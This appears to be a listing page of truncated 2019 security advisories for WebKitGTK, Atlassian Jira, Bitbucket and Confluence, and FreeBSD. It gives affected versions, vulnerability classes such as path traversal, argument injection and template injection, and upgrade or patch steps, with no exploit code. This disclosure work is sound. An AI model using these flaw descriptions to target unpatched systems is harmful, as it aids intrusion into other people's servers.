Tech. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8812 Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before 2.26.2. Credit to an anonymous researcher. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8813 Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1. Credit to an anonymous researcher. Impact: Processing maliciously crafted web content may lead to universal cross site scripting. Description: A logic issue was addressed with improved state management. CVE-2019-8814 Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before 2.26.2. Credit to Cheolung Lee of LINE+ Security Team. Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Description: Multiple memory corruption issues were addressed with imp
Jira Service Desk Server and Jira Service Desk Data Center Security Advisory - 2019-11-06 - CVE-2019-15003, CVE-2019-15004
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-11-06-979412717.html . CVE ID: * CVE-2019-15003 * CVE-2019-15004 Product: Jira Service Desk Server and Data Center. Affected Jira Service Desk Server and Data Center product versions: version < 3.9.17 3.10.0 <= version < 3.16.11 4.0.0 <= version < 4.2.6 4.3.0 <= version < 4.3.5 4.4.0 <= version < 4.4.3 4.5.0 <= version < 4.5.1 Fixed Jira Service Desk Server and Data Center product versions: * for 3.9.x, Jira Service Desk Server and Data Center 3.9.17 has been released with a fix for this issue. * for 3.16.x, Jira Service Desk Server and Data Center 3.16.11 has been released with a fix for this issue. * for 4.2.x, Jira Service Desk Server and Data Center 4.2.6 has been released with a fix for this issue. * for 4.3.x, Jira Service Desk Server and Data Center 4.3.5 has been released with a fix for this issue. * for 4.4.x, Jira Service Desk Server and Data Center 4.4.3 has been released with a fix for this issue. * for 4.5.x, Jira Service Desk Server and Data Center 4.5.1 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Jira Service Desk Server and Data Center are affected by this vulnerability. Customers who have upgraded Jira Service Desk Server and Data Center to version 3.9.17 or 3.16.11 or 4.2.6 or 4.3.5 or 4.4.3 or 4.5.1 are not affected. Customers who have downloaded and installed Jira Service Desk Server and Data Center less than 3.9.17 (the fixed version for 3.9.x) or who have downloaded and installed Jira Service Desk Server and Data Center >= 3.10.0 but less than 3.16.11 (the fixed version for 3.16.x) or who have downloaded and installed Jira Service Desk Server and Data Center >= 4.0.0 but less than 4.2.6 (the fixed version for 4.2.x) or who have downloaded and installed Jira Service Desk Server and Data Center >= 4.3.0 but less than 4.3.5 (the fixed version for 4.3.x) or who have downloaded and installed Jira Service Desk Server and Data Center >= 4.4.0 but less than 4.4.3 (the fixed version for 4.4.x) or who have downloaded and installed Jira Service Desk Server and Data Center >= 4.5.0 but less than 4.5.1 (the fixed version for 4.5.x) please upgrade your Jira Service Desk Server and Data Center installations immediately to fix this vulnerability. URL path traversal allows information disclosure - CVE-2019-15003 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: By design, Jira Service Desk gives customer portal users permissions only to raise requests and view issues. This allows users to interact with the customer portal without having direct access to Jira. These restrictions can be bypassed by a remote attacker with portal access who exploits a path traversal vulnerability. Note that attackers can grant themselves access to Jira Service Desk portals that have the Anyone can email the service desk or raise a request in the portal setting enabled. Exploitation allows an attacker to view all issues within all Jira projects contained in the vulnerable instance. This could include Jira Service Desk projects, Jira Core projects, and Jira Software projects. Versions of Jira Service Desk Server and Data Center all versions before 3.9.17 (the fixed version for 3.9.x), from version 3.10.0 before 3.16.10 (the fixed version for 3.16.x), from version 4.0.0 before 4.2.6 (the fixed version for 4.2.x), from version 4.3.0 before 4.3.5 (the fixed version for 4.3.x), from version 4.4.0 before 4.4.3 (the fixed version for 4.4.x), and from version 4.5.0 before 4.5.1 (the fixed version for 4.5.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/JSDSERVER-6589 . Fix: To address this issue, we've released the following versions containing a fix: * Jira Service Desk Server and Data Center version 3.9.17 * Jira Service Desk Server and Data Center version 3.16.11 * Jira Service Desk Server and Data Center version 4.2.6 * Jira Service Desk Server and Data Center version 4.3.5 * Jira Service Desk Server and Data Center version 4.4.3 * Jira Service Desk Server and Data Center version 4.5.1 Remediation: Upgrade Jira Service Desk Server and Data Center to version 4.5.1 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Jira Service Desk Server and Data Center 3.9.x and cannot upgrade to 4.5.1, upgrade to version 3.9.17. If you are running Jira Service Desk Serv
Security Advisory for Jira Plug-in: In-App & Desktop Notification
CVE-2019-16906 CVE-2019-16907 CVE-2019-16908 CVE-2019-16909 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-041.txt https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-042.txt https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-043.txt
Bitbucket Server security advisory 2019-09-18
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/x/Czc4Og . CVE ID: * CVE-2019-15000. Product: Bitbucket Server and Bitbucket Data Center. Affected Bitbucket Server and Bitbucket Data Center product versions: version < 5.16.10 6.0.0 <= version < 6.0.10 6.1.0 <= version < 6.1.8 6.2.0 <= version < 6.2.6 6.3.0 <= version < 6.3.5 6.4.0 <= version < 6.4.3 6.5.0 <= version < 6.5.2 Fixed Bitbucket Server and Bitbucket Data Center product versions: * for 5.16.x, Bitbucket Server and Bitbucket Data Center 5.16.10 has been released with a fix for this issue. * for 6.0.x, Bitbucket Server and Bitbucket Data Center 6.0.10 has been released with a fix for this issue. * for 6.1.x, Bitbucket Server and Bitbucket Data Center 6.1.8 has been released with a fix for this issue. * for 6.2.x, Bitbucket Server and Bitbucket Data Center 6.2.6 has been released with a fix for this issue. * for 6.3.x, Bitbucket Server and Bitbucket Data Center 6.3.5 has been released with a fix for this issue. * for 6.4.x, Bitbucket Server and Bitbucket Data Center 6.4.3 has been released with a fix for this issue. * for 6.5.x, Bitbucket Server and Bitbucket Data Center 6.5.2 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Bitbucket Server and Bitbucket Data Center before 5.16.10 (the fixed version for 5.16.x), from version 6.0.0 before 6.0.10 (the fixed version for 6.0.x), from version 6.1.0 before 6.1.8 (the fixed version for 6.1.x), from version 6.2.0 before 6.2.6 (the fixed version for 6.2.x), from version 6.3.0 before 6.3.5 (the fixed version for 6.3.x), from version 6.4.0 before 6.4.3 (the fixed version for 6.4.x), and from version 6.5.0 before 6.5.2 (the fixed version for 6.5.x) are affected by this vulnerability. Customers who have upgraded Bitbucket Server and Bitbucket Data Center to version 5.16.10 or 6.0.10 or 6.1.8 or 6.2.6 or 6.3.5 or 6.4.3 or 6.5.2 or 6.6.0 are not affected. Customers who have downloaded and installed Bitbucket Server and Bitbucket Data Center less than 5.16.10 (the fixed version for 5.16.x) or who have downloaded and installed Bitbucket Server and Bitbucket Data Center >= 6.0.0 but less than 6.0.10 (the fixed version for 6.0.x) or who have downloaded and installed Bitbucket Server and Bitbucket Data Center >= 6.1.0 but less than 6.1.8 (the fixed version for 6.1.x) or who have downloaded and installed Bitbucket Server and Bitbucket Data Center >= 6.2.0 but less than 6.2.6 (the fixed version for 6.2.x) or who have downloaded and installed Bitbucket Server and Bitbucket Data Center >= 6.3.0 but less than 6.3.5 (the fixed version for 6.3.x) or who have downloaded and installed Bitbucket Server and Bitbucket Data Center >= 6.4.0 but less than 6.4.3 (the fixed version for 6.4.x) or who have downloaded and installed Bitbucket Server and Bitbucket Data Center >= 6.5.0 but less than 6.5.2 (the fixed version for 6.5.x) please upgrade your Bitbucket Server and Bitbucket Data Center installations immediately to fix this vulnerability. Argument Injection - CVE-2019-15000 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Bitbucket Server and Bitbucket Data Center had an argument injection vulnerability, allowing an attacker to inject additional arguments into Git commands, which could lead to remote code execution. Remote attackers can exploit this argument injection vulnerability if they are able to access a Git repository in Bitbucket Server or Bitbucket Data Center. If public access is enabled for a project or repository, then attackers are able to exploit this issue anonymously. Versions of Bitbucket Server and Bitbucket Data Center before 5.16.10 (the fixed version for 5.16.x), from version 6.0.0 before 6.0.10 (the fixed version for 6.0.x), from version 6.1.0 before 6.1.8 (the fixed version for 6.1.x), from version 6.2.0 before 6.2.6 (the fixed version for 6.2.x), from version 6.3.0 before 6.3.5 (the fixed version for 6.3.x), from version 6.4.0 before 6.4.3 (the fixed version for 6.4.x), and from version 6.5.0 before 6.5.2 (the fixed version for 6.5.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/BSERV-11947 . Fix: To address this issue, we've released the following versions containing a fix: * Bitbucket Server and Bitbucket Data Center version 5.16.10 * Bitbucket Server and Bitbucket Data Center version 6.0.10 * Bitbucket Server and Bitbucket Data Center version 6.1.8 * Bitbucket Server and Bitbucket Data Center version 6.2.6 * Bitbucket Server
Jira Security Advisory - 2019-09-18 - CVE-2019-15001
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/x/KkU4Og . CVE ID: * CVE-2019-15001. Product: Jira Server and Data Center. Affected Jira Server and Data Center product versions: 7.0.10 <= version < 7.6.16 7.7.0 <= version < 7.13.8 8.0.0 <= version < 8.1.3 8.2.0 <= version < 8.2.5 8.3.0 <= version < 8.3.4 8.4.0 <= version < 8.4.1 Fixed Jira Server and Data Center product versions: * for 7.6.x, Jira Server and Data Center 7.6.16 has been released with a fix for this issue. * for 7.13.x, Jira Server and Data Center 7.13.8 has been released with a fix for this issue. * for 8.1.x, Jira Server and Data Center 8.1.3 has been released with a fix for this issue. * for 8.2.x, Jira Server and Data Center 8.2.5 has been released with a fix for this issue. * for 8.3.x, Jira Server and Data Center 8.3.4 has been released with a fix for this issue. * for 8.4.x, Jira Server and Data Center 8.4.1 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Jira Server and Data Center starting with version 7.0.10 before 7.6.16 (the fixed version for 7.6.x), from version 7.7.0 before 7.13.8 (the fixed version for 7.13.x),from version 8.0.0 before 8.1.3 (the fixed version for 8.1.x), from version 8.2.0 before 8.2.5 (the fixed version for 8.2.x), from version 8.3.0 before 8.3.4 (the fixed version for 8.3.x), from version 8.4.0 before 8.4.1 (the fixed version for 8.4.x) are affected by this vulnerability. Customers who have upgraded Jira Server and Data Center to version 7.6.16 or 7.13.8 or 8.1.3 or 8.2.5 or 8.3.4 or 8.4.1 are not affected. Customers who have downloaded and installed Jira Server and Data Center >= 7.0.10 but less than 7.6.16 (the fixed version for 7.6.x) or who have downloaded and installed Jira Server and Data Center >= 7.7.0 but less than 7.13.8 (the fixed version for 7.13.x) or who have downloaded and installed Jira Server and Data Center >= 8.0.0 but less than 8.1.3 (the fixed version for 8.1.x) or who have downloaded and installed Jira Server and Data Center >= 8.2.0 but less than 8.2.5 (the fixed version for 8.2.x) or who have downloaded and installed Jira Server and Data Center >= 8.3.0 but less than 8.3.4 (the fixed version for 8.3.x) or who have downloaded and installed Jira Server and Data Center >= 8.4.0 but less than 8.4.1 (the fixed version for 8.4.x) please upgrade your Jira Server and Data Center installations immediately to fix this vulnerability. Template injection in Template injection in Jira Importers Plugin - CVE-2019-15001 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: There was a server-side template injection vulnerability in Jira Server and Data Center, in the Jira Importers Plugin (JIM). An attacker with "JIRA Administrators" access can exploit this issue. Successful exploitation of this issue allows an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. Versions of Jira Server and Data Center starting with version 7.0.10 before 7.6.16 (the fixed version for 7.6.x), from version 7.7.0 before 7.13.8 (the fixed version for 7.13.x),from version 8.0.0 before 8.1.3 (the fixed version for 8.1.x), from version 8.2.0 before 8.2.5 (the fixed version for 8.2.x), from version 8.3.0 before 8.3.4 (the fixed version for 8.3.x), from version 8.4.0 before 8.4.1 (the fixed version for 8.4.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/JRASERVER-69933 . Fix: To address this issue, we've released the following versions containing a fix: * Jira Server and Data Center version 7.6.16 * Jira Server and Data Center version 7.13.8 * Jira Server and Data Center version 8.1.3 * Jira Server and Data Center version 8.2.5 * Jira Server and Data Center version 8.3.4 * Jira Server and Data Center version 8.4.1 Remediation: Upgrade Jira Server and Data Center to version 8.4.1 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Jira Server and Data Center 7.6.x and cannot upgrade to 8.4.1, upgrade to version 7.6.16. If you are running Jira Server and Data Center 7.13.x and cannot upgrade to 8.4.1, upgrade to version 7.13.8. If you are running Jira Server and Data Center 8.1.x and cannot upgrade to 8.4.1, upgrade to version 8.1.3. If you are running Jira Server and Data Center 8.2.x and cannot upgrade to 8.4.1, upgrade to version 8.2.5. If you are running Jira Server and Data Center
Advisory for Confluence Server Local File Disclosure Vulnerability (CVE-2019-3394)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 This email refers to the advisory found at https://confluence.atlassian.com/x/uAsvOg . CVE ID: * CVE-2019-3394. Product: Confluence Server. Affected Confluence Server product versions: 6.1.0 <= version < 6.6.16 6.7.0 <= version < 6.13.7 6.14.0 <= version < 6.15.8 Fixed Confluence Server product versions: * Confluence Server 6.6.16 has been released with a fix for this issue. * Confluence Server 6.13.7 has been released with a fix for this issue. * Confluence Server 6.15.8 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Confluence Server This advisory discloses a critical severity security vulnerability which was introduced in version 6.1.0 of Confluence Server. Versions of Confluence Server and Confluence Data Center starting with 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability. are affected by this vulnerability. Customers who have upgraded Confluence Server to version 6.6.16 or 6.13.7 or 6.15.8 are not affected. Customers who have downloaded and installed Confluence Server >= 6.1.0 but less than 6.6.16 or who have downloaded and installed Confluence Server >= 6.7.0 but less than 6.13.7 or who have downloaded and installed Confluence Server >= 6.14.0 but less than 6.15.8 please upgrade your Confluence Server installations immediately to fix this vulnerability. Local File Disclosure Vulnerability - CVE-2019-3394 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Confluence Server and Data Center had a local file disclosure vulnerability in the page export function. A remote attacker who has Add Page space permission would be able to read arbitrary files in the <install-directory>/confluence/WEB-INF directory, which may contain configuration files used for integrating with other services, potentially leaking credentials, such as LDAP credentials, or other sensitive information. The potential to leak LDAP credentials exists if LDAP credentials are specified in an atlassian-user.xml file, which is a deprecated method for configuring LDAP integration. Versions of Confluence Server This advisory discloses a critical severity security vulnerability which was introduced in version 6.1.0 of Confluence Server. Versions of Confluence Server and Confluence Data Center starting with 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability. are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/CONFSERVER-58734 . Fix: To address this issue, we've released the following versions containing a fix: * Confluence Server version 6.6.16 * Confluence Server version 6.13.7 * Confluence Server version 6.15.8 Remediation: Upgrade Confluence Server to version 6.15.8 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. For a full description of the latest version of Confluence Server, see the release notes found at https://confluence.atlassian.com/display/DOC/Confluence+Release+Notes. You can download the latest version of Confluence Server from the download centre found at https://www.atlassian.com/software/confluence/download. Support: If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/. -BEGIN PGP SIGNATURE- iQJLBAEBCAA1FiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAl1prR8XHHNlY3VyaXR5 QGF0bGFzc2lhbi5jb20ACgkQJCCXorxSdqDY1w/+Pn9VU9IXsB+zK5qAnpcjeyIq nGTUCw8Wxp1LLd8UAmBYGA6nuVtxjQrM4e/NIQRcFATrVwqOVOrYUheuuggrPjhq O3AhcreWEPjsUM/8dSB/bOepy3o6C7XEXptsnCQe0Ia2Dgvh8FFln1xEtIhyL3zc RqNSijYDw4od2MlGmJObWZPLuX0URmxInQy2WgD1NNXfvvXfZVPyraSJvRBlHxTA fIPz0E30VE9VfKeCrK0wQvfMNFqkhuASXuJ6bPKDSWgXX0UCoEoU18++Kt1w/hz/ MWIZml4webwRx7hanHH0Rbg1WSy2KYXFgEFnyGanHu3xmBc3LthkVed0XQMaJjN5 tVSFnBUR142EBXKJjw5gIi9B0LSn3wVLpBjneBqJhsPA67Q9830CysbnLu93Ces3 p/V8rLOIBICLmr7F5MW0U8bUDObokmGIx2v1w5wROR7nsbtzMVqpFg31YnQ6EKms 4nvhV4C1BwdlHeN0wGvhwJH1IAKfR/Dm3/G17Stxc6fykw9RY4Cz7tpJraon7kUW WLXxbVKSQ1ni7uvQzYE4dfDSxbDQe1asrahieHp5V9f38Zl7QD/dhgQMLN5xLUvv GVR5bb2ThfNFh7fLBriEK+jB6DT+9a0t17eaQh42/4cERpBsZef5ubxgBHkUt63f t/pe2Qj+HKZeGstVdyQ= =Bt80 -END PGP SIGNATURE-
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0004
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0004 Date reported : August 29, 2019 Advisory ID : WSA-2019-0004 WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0004.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0004.html CVE identifiers : CVE-2019-8644, CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8690. Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2019-8644 Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3. Credit to G. Geshev working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8649 Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3. Credit to Sergei Glazunov of Google Project Zero. Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management. CVE-2019-8658 Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3. Credit to akayn working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was addressed with improved state management. CVE-2019-8666 Versions affected: WebKitGTK and WPE WebKit before 2.24.3. Credit to Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8669 Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3. Credit to akayn working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8671 Versions affected: WebKitGTK and WPE WebKit before 2.24.2. Credit to Apple. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8672 Versions affected: WebKitGTK and WPE WebKit before 2.24.2. Credit to Samuel Groß of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8673 Versions affected: WebKitGTK and WPE WebKit before 2.24.3. Credit to Soyeon Park and Wen Xu of SSLab at Georgia Tech. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8676 Versions affected: WebKitGTK and WPE WebKit before 2.24.3. Credit to Soyeon Park and Wen Xu of SSLab at Georgia Tech. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8677 Versions affected: WebKitGTK and WPE WebKit before 2.24.2. Credit to Jihui Lu of Tencent KeenLab. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8678 Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3. Credit to an anonymous researcher, Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan_h0) of Knownsec, Byron Wai of VX Browser Exploitation. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8679 Ve
FreeBSD Security Advisory FreeBSD-SA-19:23.midi [REVISED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:23.midi Security Advisory The FreeBSD Project Topic: kernel memory disclosure from /dev/midistat Category: core Module: sound Announced: 2019-08-20 Credits:Peter Holm, Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5612 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2019-08-20 Initial release. v1.1 2019-08-21 Updated workaround. I. Background /dev/midistat is a device file which can be read to obtain a human-readable list of the available MIDI-capable devices in the system. II. Problem Description The kernel driver for /dev/midistat implements a handler for read(2). This handler is not thread-safe, and a multi-threaded program can exploit races in the handler to cause it to copy out kernel memory outside the boundaries of midistat's data buffer. III. Impact The races allow a program to read kernel memory within a 4GB window centered at midistat's data buffer. The buffer is allocated each time the device is opened, so an attacker is not limited to a static 4GB region of memory. On 32-bit platforms, an attempt to trigger the race may cause a page fault in kernel mode, leading to a panic. IV. Workaround Restrict permissions on /dev/midistat by adding an entry to /etc/devfs.conf and restarting the service: # echo "perm midistat 0600" >> /etc/devfs.conf # service devfs restart Custom kernels without "device sound" are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc # gpg --verify midi.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r351264 releng/12.0/ r351260 stable/11/r351265 releng/11.3/ r351260 releng/11.2/ r351260 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1d58xfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cJ3pw//fbHMCysvmMh+2RZ47d4i9d61cdYEq51VUwT2Cp2pGz+mWAoac89c4
FreeBSD Security Advisory FreeBSD-SA-19:24.mqueuefs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:24.mqueuefs Security Advisory The FreeBSD Project Topic: Reference count overflow in mqueue filesystem 32-bit compat Category: core Module: kernel Announced: 2019-08-20 Credits:Karsten König, Secfault Security Affects:All supported versions of FreeBSD. Corrected: 2019-08-20 17:45:22 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:51:32 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-20 17:46:22 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:51:32 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:51:32 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5603 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. Note: This issue is related to the previously disclosed SA-19:15.mqueuefs. It is another instance of the same bug and as such shares the same CVE. I. Background mqueuefs(5) implements POSIX message queue file system which can be used by processes as a communication mechanism. 'struct file' represents open files, directories, sockets and other entities. II. Problem Description System calls operating on file descriptors obtain a reference to relevant struct file which due to a programming error was not always put back, which in turn could be used to overflow the counter of affected struct file. III. Impact A local user can use this flaw to obtain access to files, directories, sockets, etc., opened by processes owned by other users. If obtained struct file represents a directory from outside of user's jail, it can be used to access files outside of the jail. If the user in question is a jailed root they can obtain root privileges on the host system. IV. Workaround No workaround is available. Note that the mqueuefs file system is not enabled by default. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch # fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch.asc # gpg --verify mqueuefs.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r351255 releng/12.0/ r351261 stable/11/r351257 releng/11.3/ r351261 releng/11.2/ r351261 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:24.mqueuefs.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPglfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIKGA/+Oh+ORvFs273SJwaYaf8LCJ21IJnzVxDp9vS6MSO79LmI6HeiqAy9apQs Ec4zOXvE5MzYfA+E9
FreeBSD Security Advisory FreeBSD-SA-19:23.midi
